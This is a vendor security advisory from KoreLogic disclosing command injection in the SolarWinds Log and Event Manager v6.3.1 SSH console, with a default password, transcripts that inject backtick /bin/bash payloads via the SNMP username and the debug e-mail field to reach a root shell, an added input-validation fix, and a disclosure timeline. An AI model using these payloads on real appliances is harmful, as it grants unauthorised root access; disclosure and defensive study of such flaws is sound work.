Security Advisory

Solarwinds LEM Management Shell Escape via Command Injection

Advisory ID
KL-001-2017-007
Published
2017-04-24
Vendor
Solarwinds

Affected Systems

Product
Log and Event Manager Virtual Appliance
Version
v6.3.1
Platform
Embedded Linux

Discovered By

Matt Bergin, Hank Leininger (KoreLogic)

Vulnerability Details

Affected Vendor: Solarwinds
Affected Product: Log and Event Manager Virtual Appliance
Affected Version: v6.3.1
Platform: Embedded Linux
CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Impact: Privileged Access
Attack Vector: SSH

Vulnerability Description

Insufficient input validation in the management console allows an authenticated SSH user to execute arbitrary commands. This yields a (root) shell on the underlying operating system.

Technical Description

Should an attacker gain access to the SSH console for the cmc user, root access to the underlying operating system can be achieved. The default password for the cmc user is “password”.

This report details two distinct attack vectors: the username input during SNMP setup and the destination email input during debug.

= SNMP =

This is accomplished by entering `/bin/bash` (wrapped in backticks, so the shell performs command substitution) in the username input during SNMP server setup.

$ ssh cmc@1.3.3.7
Password:
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
Last login: Sun Dec 11 11:25:07 2016 from 1.3.3.6
  //////////////////////////////////////////////////
  ///       SolarWinds Log & Event Manager       ///
  ///                   management console       ///
  //////////////////////////////////////////////////

Detected VMware Virtual Platform
Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
Available commands:
  [ appliance ]  Network, System
  [ manager ]    Upgrade, Debug
  [ service ]    Restrictions, SSH, Snort
  [ ndepth ]     nDepth Configuration/Maintenance
    upgrade      Upgrade this Appliance
    admin        Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)
    import       Import a file that can be used from the Admin UI
    help         display this help
    exit         Exit
cmc > service
Available commands:
    startssh           Start the SSH Service
    stopssh            Stop the SSH Service
    restartssh         Restart the SSH Service
    restrictssh        Restrict Access to the SSH Service (by IP Address/hostname)
    unrestrictssh      Remove Restrictions on Access to the SSH Service
    snmp               Configure the SNMP Services
    copysnortrules     Copy Snort rules to floppy or network share
    loadsnortrules     Load Snort rules from floppy or network share
    loadsnortbackup    Load Snort rules from backup
    restartsnort       Restart the Snort Service
    enableflow         * Enable the flow Collection Service
    disableflow        Disable the flow Collection Service
    restrictconsole    Restrict Access to the Manager Console (GUI) by IP/hostname
    unrestrictconsole  Remove Restrictions on Access to the Console (GUI)
    restrictreports    Restrict Access to Reports by IP/hostname
    unrestrictreports  Remove Restrictions on Access to Reports
    stopopsec          Stop all running OPSEC LEA client connections
    help               display this help
    exit               Return to main menu

    NOTE: Commands with an asterisk (*) include an automatic manager service restart
cmc::service > snmp
SNMP Trap Logging Service is RUNNNING
Would you like to STOP the SNMP Trap Logging Service? [Y/n] Y

SNMP Request Service is RUNNNING
Would you like to STOP the SNMP Request Service? [Y/n] Y

The SNMP Trap Logging Service is stopped.
The SNMP Request Service is stopped.
cmc::service > snmp
SNMP Trap Logging Service is DISABLED
Would you like to ENABLE the SNMP Trap Logging Service? [Y/n] Y

SNMP Request Service is DISABLED
Would you like to ENABLE the SNMP Request Service? [Y/n] Y

Enter the port number to access SNMP on LEM (default: 161):
Enter the username to access SNMP on LEM (default: orion): `/bin/bash`
Enter the password hashing algorithm (SHA1, MD5 or NO for no authentication, default: SHA1):
Enter the authentication password (default: orion123):
Enter the communication encryption algorithm (AES128, DES56 or NO for no encryption, default: AES128):
Enter the encryption key (default: orion123):

cmc@swi-lem:/usr/local/contego$

= Debug =

This is accomplished by entering `/bin/bash >&2` (wrapped in backticks, so the shell performs command substitution) in the destination e-mail input during debug.

$ ssh cmc@1.3.3.7
Password:
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
Last login: Sun Dec 11 23:57:16 2016 from 1.3.3.6
  //////////////////////////////////////////////////
  ///       SolarWinds Log & Event Manager       ///
  ///                   management console       ///
  //////////////////////////////////////////////////

Detected VMware Virtual Platform
Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
Available commands:
  [ appliance ]  Network, System
  [ manager ]    Upgrade, Debug
  [ service ]    Restrictions, SSH, Snort
  [ ndepth ]     nDepth Configuration/Maintenance
    upgrade      Upgrade this Appliance
    admin        Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)
    import       Import a file that can be used from the Admin UI
    help         display this help
    exit         Exit
cmc > manager
Available commands:
    actortoolupgrade   * Upgrade your Manager's Actor Tools (CD/floppy)
    archiveconfig      Set your Manager Database Archive Schedule/Settings
    backupconfig       Set your Manager Backup Schedule/Settings
    cleanagentconfig   Reconfigure the agent on this box to a new manager
    configurendepth    * Configure the manager to use an nDepth server.
    confselfsignedcert * Configure the manager to use a self signed certificate
    dbrestart          Restart database
    debug              Send Debugging Information to an Alternate Address
    disabletls         Disable TLS for DB connections
    enabletls          Enable TLS for DB connections
    exportcert         Export the CA certificate for console
    exportcertrequest  Export a certificate request for signing by CA
    hotfix             Install LEM hotfix.
    importcert         * Import a certificate used for console communication
    importl4ca         * Import a CA of the other node in L4 configuration
    licenseupgrade     * Upgrade your Manager License (CD/floppy/network)
    logbackupconfig    Set your Manager Log Backup Schedule/Settings
    resetadmin         Reset the "admin" user password to default
    restart            * Restart Manager Service
    sensortoolupgrade  Upgrade your Manager and Agent Sensor Tools (CD/floppy)
    showlog            Show Manager Log File
    showmanagermem     Show the memory setting of SolarWinds manager
    start              Start Manager Service
    stop               * Stop Manager Service
    support            Send Debugging Information to Tech Support @trigeo.com
    togglehttp         * Enable or disable HTTP (port 80).
    viewsysinfo        Show information about machine and SolarWinds manager
    watchlog           Watch Manager Log File
    exit               Return to main menu

    NOTE: Commands with an asterisk (*) include an automatic manager service restart
cmc::manager > debug
Press <enter> to capture debugging information
You will need to provide an SMTP server or Windows File Sharing Credentials

Collecting general system information......UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
.e.sudo: unable to resolve host swi-lem
sudo: unable to resolve host swi-lem
.cat: /etc/hosts: No such file or directory
 done.
sudo: unable to resolve host swi-lem
E-Mail/Network share/Quit? (e/n/q) e
E-Mail/Network share/Quit? (e/n/q) e
Please enter the e-mail recipient:
   (e.g. support@trigeo.com)
> `/bin/bash >&2`
Is the e-mail address <`/bin/bash >&2`> correct? <Y/n> Y
Please enter the name this message should appear from
   (e.g. Someone Important)
> Test
Is the name Test correct? <Y/n> Y
Please enter the e-mail address this message should appear from
   (e.g. someone@trigeo.com)
> fake@localhost
Is the e-mail address fake@localhost correct? <Y/n> Y
Please enter the SMTP server you wish to send mail through
   (e.g. smtp.yournetwork.com)
> 127.0.0.1
Is the SMTP server 127.0.0.1 correct? <Y/n> Y
Please enter the name of your company
   (e.g. Initech, Post Falls branch or Veridian Dynamics)
> Test
Is the company Test correct? <Y/n> Y
Please enter a phone number where you can be reached
   (e.g. 509.555.1234)
> Test
Is the number Test correct? <Y/n> Y

--(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]--
/tmp # id
uid=0(root) gid=0(root) groups=0(root)
--(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]--
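The following is an added example, not code from the advisory or from SolarWinds. It sketches, in POSIX shell, the input handling that closes both vectors shown above: each value is checked against a conservative character allow-list before use, and it is then handed to the receiving command as a single quoted argument rather than being interpolated into a command string that the shell re-parses. The function names and the command names that get printed (lem_snmp_setup, mail) are assumptions; printf stands in for the real configuration tool.

```shell
#!/bin/sh
# Added example, not SolarWinds code: allow-list validation for interactive
# console inputs that later reach a shell command line (the SNMP username and
# the debug e-mail recipient in the advisory). Function names and the
# printed command names (lem_snmp_setup, mail) are placeholders.

# Accept only a conservative character set; everything the shell treats
# specially (backticks, $, ;, |, &, >, <, quotes, whitespace) is outside it.
is_safe_token() {
    case "$1" in
        '')                  return 1 ;;   # empty value
        *[!A-Za-z0-9_.@-]*)  return 1 ;;   # any character outside the allow-list
        *)                   return 0 ;;
    esac
}

# E-mail recipient: same allow-list plus a minimal local@domain shape check.
is_plausible_email() {
    is_safe_token "$1" || return 1
    case "$1" in
        *@*@*)  return 1 ;;   # more than one @
        ?*@?*)  return 0 ;;   # non-empty local part and non-empty domain
        *)      return 1 ;;
    esac
}

# Vulnerable shape (what the advisory's transcripts demonstrate), kept only
# as a comment: building a string and letting the shell re-parse it, e.g.
#   eval "lem_snmp_setup --user=$user"
# Safe shape: validate first, then pass the value as one quoted argv word.
# The receiving command sees the literal bytes; nothing is re-interpreted.
configure_snmp_user() {
    if ! is_safe_token "$1"; then
        printf 'rejected SNMP username\n' >&2
        return 1
    fi
    # printf stands in for the real tool; "$1" would be passed the same way.
    printf 'lem_snmp_setup --user=%s\n' "$1"
}

send_debug_bundle() {
    if ! is_plausible_email "$1"; then
        printf 'rejected e-mail recipient\n' >&2
        return 1
    fi
    printf 'mail -s debug-bundle %s\n' "$1"
}

# Stand-alone demo: accepted values print the command line that would run,
# rejected values (including the advisory's backtick payloads) return 1.
configure_snmp_user orion
configure_snmp_user '`/bin/bash`' || echo "blocked SNMP input"
send_debug_bundle support@trigeo.com
send_debug_bundle '`/bin/bash >&2`' || echo "blocked debug input"
```

The allow-list is deliberately narrow: a username or address that legitimately needs characters outside it should be handled by widening the list one character at a time, never by dropping the check, and the value must still travel as its own argument so the shell has no opportunity to expand it.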

Mitigation and Remediation Recommendation

The vendor has released a Hotfix to remediate this vulnerability. Hotfix and installation instructions are available at:

https://thwack.solarwinds.com/thread/111223

Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) and Hank Leininger of KoreLogic, Inc.

Proof of Concept

See the Technical Description section above.

The contents of this advisory are copyright (c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

Disclosure Timeline

KoreLogic sends vulnerability report and PoC to Solarwinds <psirt@solarwinds.com> using PGP key with fingerprint A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F.

Solarwinds replies that the key is no longer in use, requests alternate communication channel.

KoreLogic submits vulnerability report and PoC to alternate Solarwinds contact.

Solarwinds confirms receipt of vulnerability report.

30 business days have elapsed since Solarwinds acknowledged receipt of vulnerability details.

Solarwinds releases hotfix and public disclosure.

KoreLogic public disclosure.

Responsible Disclosure

KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.

Vendor notification and coordination
90+ day disclosure timeline
CVE coordination when applicable